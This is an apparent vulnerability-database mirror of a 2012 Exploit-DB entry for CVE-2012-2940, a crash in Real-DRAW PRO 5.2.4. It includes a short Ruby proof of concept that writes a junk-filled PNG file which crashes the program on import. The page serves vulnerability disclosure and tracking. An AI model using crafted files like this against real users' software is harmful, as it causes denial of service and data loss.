Lucene search
+L

Real-DRAW PRO 5.2.4 - Import File Crash

🗓️ 21 May 2012 00:00:00Reported by Ahmed Elhady MohamedType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Real-DRAW PRO 5.2.4 Import File Crash - Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-2940
21 May 201200:00
circl
cve
CVE
CVE-2012-2940
27 May 201220:00
cve
cvelist
Cvelist
CVE-2012-2940
27 May 201220:00
cvelist
euvd
EUVD
EUVD-2012-2919
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-2940
27 May 201220:55
nvd
prion
Prion
Design/Logic Flaw
27 May 201220:55
prion
Real-DRAW PRO 5.2.4 Import File Crash
===================================================================================
# Exploit Title:Real-DRAW PRO 5.2.4 Malicious PNG File Denial of service
# Vendor : http://www.mediachance.com/
# Author: Ahmed Elhady Mohamed
# Email : [email protected]
# Website: www.infosec4all.tk
# version: 5.2.4
# Category: DOS
# Tested on: windows XP SP3
===================================================================================



########################################DESC#############################################
#Real-Draw seamlessly combines vector tools with the rich look of pixel based images and#
#innovative natural paint techniques into a single graphics editor.                     #
#########################################################################################

########################################################################################
#Real-DRAW PRO 5.2.4 crashes while importing a crafted PNG, WMF, PSD, TGA, TTF, BMP,   #
#TIFF and PCX file                                                                     #
#To trigger the exploit , go to file->Import                                           #
########################################################################################


#!/usr/bin/ruby


File.open "Crash.png" , "w" do |file|
junk = "A" *1000
file.write junk
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation